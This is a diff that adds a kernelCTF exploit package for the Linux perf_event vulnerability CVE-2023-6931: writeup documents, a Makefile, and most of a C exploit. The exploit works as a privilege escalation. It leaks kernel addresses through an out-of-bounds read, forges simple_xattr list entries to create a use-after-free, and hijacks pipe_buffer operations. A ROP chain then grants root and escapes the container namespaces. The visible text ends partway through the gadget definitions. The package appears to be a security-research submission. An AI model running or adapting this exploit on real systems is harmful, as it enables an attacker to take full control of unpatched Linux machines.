diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md new file mode 100644 index 00000000..12ce0e4c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md @@ -0,0 +1,188 @@ +# CVE-2023-6931 + +## Exploit Details + +Exploit demo for CVE-2023-6931. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1730717209:a3542a691dd87b35d0914ae264575ea3d6e888aa}` + +## Overview + +The vulnerability allows for multiple out-of-bounds increments at controlled offsets from the end of an array. The exploit in the LTS/COS leverages a fixed-size object called `netlink_sock` to use the SLUB allocator. However, protection techniques like `CONFIG_KMALLOC_SPLIT_VARSIZE` make exploiting this more difficult on mitigated instances. To bypass these protections, we carried out the exploit entirely within the Buddy allocator, without relying on the SLUB allocator. Using only the Buddy allocator, however, makes many useful objects unavailable and increases the complexity of the exploit. Additionally, although the vulnerability is a heap OOB, it effectively turns into a use-after-free (UAF) since the heap OOB is used to create the UAF, making it essentially the same as exploiting a UAF. + +## KASLR & Heap & VMEMMAP Leak + +```c +for_each_sibling_event(sub, leader) { + values[n++] += perf_event_count(sub); + if (read_format & PERF_FORMAT_ID) + values[n++] = primary_event_id(sub); + if (read_format & PERF_FORMAT_LOST) + values[n++] = atomic64_read(&sub->lost_samples); +} +``` +OOB happens like above. So we can use event count, event id, lost samples to tamper with adjacent objects. + +By repeatedly opening and closing the event, we can make the event ID bigger, then cover the size of the simple_xattr object with the event ID and read the members of the adjacent objects (`pipe_buffer`, `simple_xattr`) to get the KASLR, heap address and VMEMMAP. + +## Make UAF + +In kernels lower than linux-v6.2, xattr is managed using struct list_head. Therefore, if you corrupt the linked list structure of the `simple_xattr` object with oob and make it point to a fake object, you can trigger a uaf. + +``` +Note + +In kernels above linux-v6.2, xattr is managed using struct rb_node, and in this case the tree is sorted by name value, so it is possible to create uaf by correcting the order of name value and corrupting rb_left or rb_right to point to fake object. So the way to trigger uaf using `simple_xattr` object is still valid even in high kernel version. +``` + +Setting the event config to `PERF_COUNT_SW_PAGE_FAULTS` will measure page faults, so the event count can be controlled to a desired value by intentionally causing page faults. + +So I used the event count to increase the next field of `simple_xattr` by 0x30. This makes the next pointer point to the value field of `simple_xattr`, which allows me to create fake objects as I want. + +```c +int setxattr_copy(const char __user *name, struct xattr_ctx *ctx) +{ + int error; + + if (ctx->flags & ~(XATTR_CREATE|XATTR_REPLACE)) + return -EINVAL; + + error = strncpy_from_user(ctx->kname->name, name, + sizeof(ctx->kname->name)); + if (error == 0 || error == sizeof(ctx->kname->name)) + return -ERANGE; + if (error < 0) + return error; + + error = 0; + if (ctx->size) { + if (ctx->size > XATTR_SIZE_MAX) + return -E2BIG; + + ctx->kvalue = vmemdup_user(ctx->cvalue, ctx->size); + if (IS_ERR(ctx->kvalue)) { + error = PTR_ERR(ctx->kvalue); + ctx->kvalue = NULL; + } + } + + return error; +} +``` + +```c +void *vmemdup_user(const void __user *src, size_t len) +{ + void *p; + + p = kvmalloc(len, GFP_USER); + if (!p) + return ERR_PTR(-ENOMEM); + + if (copy_from_user(p, src, len)) { + kvfree(p); + return ERR_PTR(-EFAULT); + } + + return p; +} +``` +And the `simple_xattr` object allocates a temporary buffer to copy the value before object allocation as above, and kvfrees it after copying the value. If you kvfree an object with the size of buddy system order 2, the data of the page will remain as it is, so if you use the above logic well, you can freely control all data including the header data of the reallocated object such as the uaf object. I actively utilized this temporary buffer in my exploit. +```c +((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30; +((uint64_t *)value)[3] = 0; +((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30; +((uint64_t *)value)[5] = 0x10; +``` +The above code is the fake object. When the next field is incremented by 0x30, it points to the fake object, and the next field of the fake object is set to xattr + 0x20000 + 0x40, which is the value field of the target object to be uafed. xattr is the address of a random `simple_xattr` object that was leaked before. +```c +((uint64_t *)value)[0] = xattr + 0x18000; +((uint64_t *)value)[1] = xattr + 0x18000; +((uint64_t *)value)[2] = leakname; +((uint64_t *)value)[3] = 0x3000; +((uint64_t *)value)[4] = xattr + 0x20000 + 0x80; +((uint64_t *)value)[5] = xattr + 0x20000 + 0x60; +((uint64_t *)value)[6] = leakname; +((uint64_t *)value)[7] = 0x3000; +((uint64_t *)value)[8] = xattr + 0x20000 + 0x40; +((uint64_t *)value)[12] = xattr + 0x18000; +((uint64_t *)value)[13] = xattr + 0x20000 + 0x40; +((uint64_t *)value)[14] = leakname; +((uint64_t *)value)[15] = 0x3000; +``` +This is the target object to create the uaf. Since buddy is a Last-In-First-Out structure, if the target object is freed and reallocated, the freed target object will be recycled as a temporary buffer. Therefore, after writing the value as above, kvfree is performed immediately, but the target object is still linked to the linked list of `simple_xattr` due to the fake object, so use after free can be triggered. + +```c +bool __list_del_entry_valid(struct list_head *entry) +{ + struct list_head *prev, *next; + + prev = entry->prev; + next = entry->next; + + if (CHECK_DATA_CORRUPTION(next == NULL, + "list_del corruption, %px->next is NULL\n", entry) || + CHECK_DATA_CORRUPTION(prev == NULL, + "list_del corruption, %px->prev is NULL\n", entry) || + CHECK_DATA_CORRUPTION(next == LIST_POISON1, + "list_del corruption, %px->next is LIST_POISON1 (%px)\n", + entry, LIST_POISON1) || + CHECK_DATA_CORRUPTION(prev == LIST_POISON2, + "list_del corruption, %px->prev is LIST_POISON2 (%px)\n", + entry, LIST_POISON2) || + CHECK_DATA_CORRUPTION(prev->next != entry, + "list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n", + entry, prev->next, prev) || + CHECK_DATA_CORRUPTION(next->prev != entry, + "list_del corruption. next->prev should be %px, but was %px. (next=%px)\n", + entry, next->prev, next)) + return false; + + return true; + +} +``` +And the reason why the value of the target object is set relatively complexly is to bypass the above verification. The object can be freed normally only when `entry == prev->next && entry == next->prev` is satisfied. + +## UAF to RIP Control + +I've created UAF, but it's not perfect yet. After assigning the target object address in the free list to the object you want to overwrite, you need to free the target object linked to the linked list to overwrite the object you want. However, the moment you reallocate the target object address, the data of the target object changes to match the allocated object, so the data that satisfies the conditions `entry == prev->next && entry == next->prev` is tampered with. Therefore, you cannot free the target object linked to the `simple_xattr` linked list. + +To solve this problem, you need an object that can accept user input, such as `msg_msg`, and that can allocate over 0x2000. If you use an object that can accept user input, you can avoid destroying the target object's data by redefining the target object's data at the same time as allocating an object from the free list. + +The `user_key_payload` object satisfies the condition perfectly. Therefore, the target object address is reallocated to `user_key_payload` and the target object in the `simple_xattr` linked list is freed again. The freed target object address is reallocated to a `pipe_buffer` structure and the previously allocated `user_key_payload` object is freed. If you try to allocate the `simple_xattr` object again, the address of the freed `user_key_payload` object is assigned to a temporary buffer, allowing you to freely manipulate the fields of the previously allocated `pipe_buffer`. Now that we can overwrite `pipe_buffer->ops`, we can do rip control. I overrode `pipe_buffer->ops->release()` to make the rip controlled when freeing the `pipe_buffer`. + +## RIP Control to ROP + +Now we need to perform a stack pivot to the heap address to enable ROP. +```c +void (*release)(struct pipe_inode_info *, struct pipe_buffer *); +``` +When `pipe_buffer->ops->release()` is called, the arguments are passed as above. Therefore, the address of the `pipe_buffer` object to be released is entered into rsi. Since rsi has the address of `pipe_buffer`, we can do rop if we do `mov rsp, rsi ; ret`. However, I couldn't find such a neat gadget, so I combined `push rsi ; jmp qword ptr [rsi + 0x66]` and `pop rsp ; ret` to achieve the same effect. + +Now rsp points to the `pipe_buffer` structure. However, since there is an `pipe_buffer->ops` field to be overwritten in the header, we need to move rsp further back in order to write a clean rop chain. We moved rsp to the back by executing `pop rsp ; ret` once more. + +## ROP Chain + +```c +rop[ridx++] = pop_rdi; +rop[ridx++] = 1; +rop[ridx++] = find_task_by_vpid; +rop[ridx++] = mov_rdi_rax_pop_rbx; +rop[ridx++] = 0; +rop[ridx++] = pop_rsi; +rop[ridx++] = init_nsproxy; +rop[ridx++] = switch_task_namespaces; +rop[ridx++] = pop_rdi; +rop[ridx++] = init_cred; +rop[ridx++] = commit_creds; +rop[ridx++] = kpti_trampoline; +rop[ridx++] = 0; +rop[ridx++] = 0; +rop[ridx++] = (uint64_t)shell; +rop[ridx++] = rv.user_cs; +rop[ridx++] = rv.user_rflags; +rop[ridx++] = rv.user_rsp; +rop[ridx++] = rv.user_ss; +``` +The ROP Chain was written as above. I changed the namespace by executing `switch_task_namespace(find_task_by_vpid(1), &init_nsproxy)` and then elevated privileges to root by executing `commit_creds(&init_cred)`. + +Returning to user mode is done by calling the `swapgs_restore_regs_and_return_to_usermode` function. Since there are a lot of pops at the beginning of the function, you can skip that part and just call it. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..d340593a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/vulnerability.md @@ -0,0 +1,5 @@ +When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group can also increase and is not checked. An integer overflow can be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows. + +`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation. + +The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in 3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 (perf: Fix perf_event_validate_size())` in 6.7. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile new file mode 100644 index 00000000..e3ea5fdb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/Makefile @@ -0,0 +1,11 @@ +exploit: + gcc -masm=intel -static -o exploit exploit.c -lkeyutils + +prerequisites: + sudo apt-get install libkeyutils-dev + +run: + ./exploit + +clean: + rm exploit diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit new file mode 100755 index 00000000..280a6908 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c new file mode 100644 index 00000000..431825c0 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c @@ -0,0 +1,656 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define XATTR_PREFIX_SECURITY "security." + +struct xattr_return { + uint64_t size; + char *value; +}; + +struct pipeio { + struct { + int readfd, writefd; + } pipe; + bool is_ops_activated; +}; + +struct read_format { + __u64 value; // 카운터 값 + __u64 time_enabled; // 활성화된 시간 + __u64 time_running; // 실제 카운팅한 시간 + __u64 id; // 이벤트 ID + __u64 lost; // 잃어버린 이벤트 수 +}; + +struct list_head { + struct list_head *next, *prev; +}; + +struct msg_msgseg { + struct msg_msgseg *next; + char m_text[]; +}; + +struct msg_msg{ + struct list_head m_list; + int64_t m_type; + int m_ts; + struct msg_msgseg *next; + void *security; + char m_text[]; +}; + +struct msg { + int64_t m_type; + char m_text[]; +}; + +#define MSG_HEADER_SIZE sizeof(struct msg) +#define MSG_MSG_HEADER_SIZE sizeof(struct msg_msg) +#define MSG_MSGSEG_HEADER_SIZE sizeof(struct msg_msgseg) + +struct pipeio *pipes[0x100]; +struct pipeio *pipes1[0x10000]; + +struct pipeio *create_pipeio(void){ + struct pipeio *pio = (struct pipeio *)calloc(sizeof(struct pipeio), 1); + if(pipe((int *)&pio->pipe) < 0) + perror("pipe alloc"); + pio->is_ops_activated = false; + return pio; +} + +void resize_pipe(struct pipeio *pipe, uint64_t objectsz){ + if(fcntl(pipe->pipe.writefd, F_SETPIPE_SZ, objectsz) < 0) + perror("pipe resize"); +} + +void read_pipe(struct pipeio *pipe, char *buf, uint64_t size){ + if(read(pipe->pipe.readfd, buf, size) < 0) + perror("pipe read"); +} + +void write_pipe(struct pipeio *pipe, char *buf, uint64_t size){ + if(write(pipe->pipe.writefd, buf, size) < 0) + perror("pipe write"); + else + pipe->is_ops_activated = true; +} + +void release_pipe(struct pipeio *pipe){ + if(!pipe) + return; + close(pipe->pipe.readfd); + close(pipe->pipe.writefd); + free(pipe); +} + +int alloc_msg_queue(void){ + int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (msqid == -1) + perror("msgget"); + return msqid; +} + +void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext){ + assert(msgsz <= objectsz); + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + objectsz, 1); + msg->m_type = mtype; + memset(msg->m_text, '\xbf', objectsz); + memcpy(msg->m_text, mtext, msgsz); + if (msgsnd(msqid, msg, objectsz, 0) < 0) + perror("msgsnd"); +} + +static long +perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_group_leader, unsigned long flags){ + return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_group_leader, flags); +} + +char *gen_xattr_name(char *prefix, char *name){ + assert(prefix[strlen(prefix) - 1] == '.'); + char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + 1, 1); + strcpy(xattr_name, prefix); + strcat(xattr_name, name); + return xattr_name; +} + +struct xattr_return *read_xattr(char *fname, char *name){ + struct xattr_return *ret = (struct xattr_return *)calloc(sizeof(struct xattr_return), 1); + ret->value = (char *)calloc(0x10000, 1); + if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0) + puts("getxattr error"); + return ret; +} + +static inline key_serial_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid) +{ + return syscall(__NR_add_key, type, desc, payload, plen, ringid); +} + +static inline key_serial_t sys_keyctl(int cmd, ...) +{ + va_list ap; + long arg2, arg3, arg4, arg5; + + va_start(ap, cmd); + arg2 = va_arg(ap, long); + arg3 = va_arg(ap, long); + arg4 = va_arg(ap, long); + arg5 = va_arg(ap, long); + va_end(ap); + + return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); +} + +void spray(){ + char *fname = "/tmp/zzlol"; + close(open("/tmp/zzlol", O_CREAT, 0644)); + char value[0x5000] = {0, }; + memset(value, 'A', 0x3fc0); + char z[0x10] = {0, }; + for(int i = 0; i <= 1994; i++){ + sprintf(z,"zzlol%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + setxattr(fname, name, value, 0x3fc0, 0); + } + pipes[0] = create_pipeio(); + resize_pipe(pipes[0], 0x1000 * 0x100); + pipes[1] = create_pipeio(); + resize_pipe(pipes[1], 0x1000 * 0x100); + sprintf(z,"zzlol%d",1997); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + setxattr(fname, name, value, 0x3fc0, 0); + for(int i = 0; i < 0x10; i++){ + pipes[i] = create_pipeio(); + resize_pipe(pipes[i], 0x1000 * 0x100); + char aa[0x100] = { 0, }; + memset(aa, 'y', 0x40); + memset(aa, 't', 0x38); + memcpy(aa+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(aa+0x40,"haha%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, aa); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + } +} + +void DumpHex(const void* data, size_t size) { + char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } +} + +uint64_t virt2page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base){ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} + +void cpu_affinity(int cpu){ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + if (sched_setaffinity(0, sizeof(mask), &mask) < 0) + perror("sched_setaffinity"); +} + +void fdlimit(int limit){ + struct rlimit rl; + getrlimit(RLIMIT_NOFILE, &rl); + rl.rlim_cur = limit; + if(setrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("setrlimit"); + exit(EXIT_FAILURE); + } +} + +void signal_handler(int signo) { + if(signo == SIGUSR1){ + puts("[+] Finish Child"); + } +} + +struct register_val { + uint64_t user_rip; + uint64_t user_cs; + uint64_t user_rflags; + uint64_t user_rsp; + uint64_t user_ss; +} __attribute__((packed)); +struct register_val rv; + +void backup_rv(void) { + asm("mov rv+8, cs;" + "pushf; pop rv+16;" + "mov rv+24, rsp;" + "mov rv+32, ss;" + ); +} + +void shell(){ + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + int netns_fd = open("/proc/1/ns/net", O_RDONLY); + int pidns_fd = open("/proc/1/ns/pid", O_RDONLY); + + if (mntns_fd == -1) + perror("[-] open(/proc/1/ns/mnt)"); + if (setns(mntns_fd, CLONE_NEWNS) == -1) + perror("[-] setns mnt"); + + if (netns_fd == -1) + perror("[-] open(/proc/1/ns/net)"); + if (setns(netns_fd, CLONE_NEWNET) == -1) + perror("[-] setns net"); + + if (pidns_fd == -1) + perror("[-] open(/proc/1/ns/pid)"); + if (setns(pidns_fd, CLONE_NEWPID) == -1) + perror("[-] setns pid"); + + char *const argv[] = { "/bin/sh" }; + char *const envp[] = { NULL }; + execve("/bin/sh", argv, envp); +} + +int main(int argc, char *argv[], char *envp[]){ + cpu_affinity(0); + fdlimit(4096); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + if(signal(SIGUSR1, signal_handler) == SIG_ERR){ + puts("[-] Exploit Fail"); + exit(0); + } + int group_leader, event, finev, prev; + char count[0x10000] = { 0, }; + int events[0x10000] = { 0, }; + char value[0x3000] = {0, }; + char aa[0x100] = { 0, }; + char cmd[0x100] = {0, }; + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_ID | PERF_FORMAT_GROUP; + + group_leader = perf_event_open(&pe, 0, -1, -1, 0); + if (group_leader == -1) { + fprintf(stderr, "Error opening leader %llx\n", pe.config); + exit(EXIT_FAILURE); + } + puts("[+] Incrementing event ID"); + for(int _ = 0; _ < 10; _++){ + for(int i = 0; i < 4096; i++){ + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + close(event); + } + } + } + puts("[+] Add Siblings"); + pid_t parent_pid; + parent_pid = getpid(); + pid_t child_pid = fork(); + if(fork < 0) puts("fail"); + else if(child_pid == 0){ + for(int i = 0; i < 2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, parent_pid, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + kill(parent_pid, SIGUSR1); + sleep(999999); + } + pause(); + for(int i = 0; i < (0x10000/0x10+0x2000/0x10)-2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i+2000] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + puts("[+] Spraying xattr"); + spray(); + char *fname = "/tmp/zzlol"; + char *z = "zzlol1994"; + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + removexattr(fname, name); + read(group_leader, count, 0xffff); + for(int i = 0; i < 0x10; i++){ + write_pipe(pipes[i], "AAAAAAAA", 8); + } + z = "zzlol1997"; + name = gen_xattr_name(XATTR_PREFIX_SECURITY, z); + struct xattr_return *xret = read_xattr("/tmp/zzlol", name); + + printf("[+] xattr size: 0x%lx\n", xret->size); + uint64_t kpage = ((uint64_t *)xret->value)[0x7fc]; + uint64_t vmemmap_base = (kpage >> 28) << 28; + uint64_t kleak = ((uint64_t *)xret->value)[0x7fe]; + uint64_t kbase = kleak - 0x1c1f140; + uint64_t modprobe_path = kbase + 0x2a777e0; + printf("[+] kernel base : 0x%lx\n", kbase); + printf("[+] vmemap base : 0x%lx\n", vmemmap_base); + uint64_t xattr = ((uint64_t *)xret->value)[4092] & 0xfffffffffffffffe; + uint64_t leakname = ((uint64_t *)xret->value)[4094]; + uint64_t kheap_base = ((xattr - 0x6000000) >> 28) << 28; + printf("[+] xattr : 0x%lx\n", xattr); + printf("[+] name : 0x%lx\n", leakname); + printf("[+] kheap base : 0x%lx\n", kheap_base); + puts("[+] Closing Events"); + for(int i = 0; i < 0x10000/0x10+0x2000/0x10; i++){ + close(events[i]); + } + close(group_leader); + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_GROUP | PERF_FORMAT_LOST; + + group_leader = perf_event_open(&pe, 0, -1, -1, 0); + + puts("[+] Add Sibnings"); + parent_pid = getpid(); + child_pid = fork(); + if(fork < 0) puts("fail"); + else if(child_pid == 0){ + for(int i = 0; i < 2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, parent_pid, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + kill(parent_pid, SIGUSR1); + sleep(999999); + } + pause(); + for(int i = 0; i < (0x10000/0x10+0x2100/0x10)-2000; i++){ + if(!(i % 1000)) + puts("[+] Create Event 1000"); + struct perf_event_attr pe1; + memset(&pe1, 0, sizeof(pe)); + pe1.type = PERF_TYPE_SOFTWARE; + pe1.size = sizeof(pe1); + pe1.config = PERF_COUNT_SW_PAGE_FAULTS; + pe1.disabled = 1; + pe1.exclude_kernel = 1; + pe1.exclude_hv = 1; + event = perf_event_open(&pe1, 0, -1, group_leader, 0); + if (event == -1) { + perror("asdf"); + continue; + } + else{ + events[i+2000] = event; + ioctl(event, PERF_EVENT_IOC_ENABLE, 0); + } + } + struct pipeio *pipepipe = create_pipeio(); + resize_pipe(pipepipe, 0x1000 * 0x100); + puts("[+] Page Faulting"); + int *ptr = NULL; + ioctl(group_leader, PERF_EVENT_IOC_RESET, 0); + ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0); + for(int i = 0; i < 0x30; i++){ + ptr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + *ptr = 1; + } + ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0); + + fname = "/tmp/zzlol"; + char zz[0x100] = {0, }; + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 3); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + puts("[+] Spraying Fake xattr"); + char y[0x10000] = { 0, }; + for(int i = 0x11; i <= 100; i++){ + memset(y, 'y', 0x40); + memset(y, 't', 0x38); + memcpy(y+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(y+0x40,"haha%d",i); + char *name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + memset(value, 'B', 0x3000); + for(int j = 0; j < 4; j++) + ((uint64_t *)value)[j] = 0; + ((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30; + ((uint64_t *)value)[3] = 0; + ((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30; + ((uint64_t *)value)[5] = 0x10; + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + } + + memset(y, 'y', 0x40); + memset(y, 't', 0x38); + memcpy(y+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(y+0x40,"zzz%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + memset(value, 'C', 0x3000); + ((uint64_t *)value)[0] = xattr + 0x18000; + ((uint64_t *)value)[1] = xattr + 0x18000; + ((uint64_t *)value)[2] = leakname; + ((uint64_t *)value)[3] = 0x3000; + ((uint64_t *)value)[4] = xattr + 0x20000 + 0x80; + ((uint64_t *)value)[5] = xattr + 0x20000 + 0x60; + ((uint64_t *)value)[6] = leakname; + ((uint64_t *)value)[7] = 0x3000; + ((uint64_t *)value)[8] = xattr + 0x20000 + 0x40; + ((uint64_t *)value)[12] = xattr + 0x18000; + ((uint64_t *)value)[13] = xattr + 0x20000 + 0x40; + ((uint64_t *)value)[14] = leakname; + ((uint64_t *)value)[15] = 0x3000; + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + puts("[+] Making UAF"); + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 93); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + read(group_leader, count, 0xffff); + + sprintf(y,"zzzlolol%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + removexattr(fname, name); + release_pipe(pipepipe); + + char value1[0x5000] = {0, }; + memcpy(value1 + 8, value, 0x3000); + + key_serial_t *keys = calloc(0x10, sizeof(key_serial_t)); + keys[0] = sys_add_key("user", "key_0", value1, 0x3000, KEY_SPEC_PROCESS_KEYRING); + memset(zz, 'y', 0x40); + memset(zz, 't', 0x38); + memcpy(zz+0x38 - 9, XATTR_PREFIX_SECURITY, 9); + sprintf(zz+0x40,"haha%d", 0); + name = gen_xattr_name(XATTR_PREFIX_SECURITY, zz); + removexattr(fname, name); + + struct pipeio *uafpipe = create_pipeio(); + resize_pipe(uafpipe, 0x1000 * 0x100); + write_pipe(uafpipe, "AAAAAAAA", 8); + + if(sys_keyctl(KEYCTL_REVOKE, keys[0]) == -1){ + puts("[-] Exploit Fail"); + exit(-1); + } + + sleep(1); + + uint64_t jmpgadget = kbase + 0xcafa62; //0xffffffff81cafa62 : push rsi ; jmp qword ptr [rsi + 0x66] + uint64_t pop_rsp = kbase + 0xb0ab1c; //0xffffffff81b0ab19 : add dword ptr [rax - 0x75], ecx ; pop rsp ; ret + uint64_t pop_rdi = kbase + 0xb307d; //0xffffffff810b307d : pop rdi ; ret + uint64_t pop_rsi = kbase + 0x24cc0e; //0xffffffff8124cc0c : or al, ch ; pop rsi ; ret + uint64_t mov_rdi_rax_pop_rbx = kbase + 0xd9883d; //0xffffffff81d9883d : mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605280, 0xffffffff82605280 is ret + uint64_t init_nsproxy = kbase + 